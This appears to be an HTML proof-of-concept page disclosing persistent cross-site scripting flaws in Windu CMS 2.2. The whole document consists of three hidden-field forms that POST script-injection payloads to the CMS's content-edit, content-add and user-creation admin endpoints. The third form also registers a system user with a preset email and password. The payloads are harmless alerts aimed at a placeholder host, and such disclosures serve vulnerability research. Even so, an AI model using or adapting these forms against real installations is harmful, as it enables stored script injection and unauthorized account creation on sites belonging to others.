&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Windu CMS 2.2 Multiple Persistent Cross-Site Scripting Vulnerabilities&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;&lt;center&gt;&lt;br /&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://www.example.com/winducms/admin/content/edit/659/?mn=admin.message.error&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;name&quot; value='&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;' /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;form_key&quot; value=&quot;addLang&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;XSS #1&quot; /&gt;
&lt;/form&gt;
&lt;br /&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://www.example.com/winducms/admin/content/add/760/?mn=admin.message.error&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;name&quot; value='&quot;&gt;&lt;script&gt;alert(2);&lt;/script&gt;' /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;type&quot; value=&quot;1&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;form_key&quot; value=&quot;add&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;XSS #2&quot; /&gt;
&lt;/form&gt;
&lt;br /&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://www.example.com/winducms/admin/users/?mn=admin.message.error&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;type&quot; value=&quot;17&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;lab@zeroscience.mk&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;testing...1.2.3&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;passwordCompare&quot; value=&quot;testing...1.2.3&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;username&quot; value='&quot;&gt;&lt;script&gt;alert(3);&lt;/script&gt;' /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;Zero Science Lab&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;surname&quot; value=&quot;ZSL&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;form_key&quot; value=&quot;addUserSystem&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;XSS #3&quot; /&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
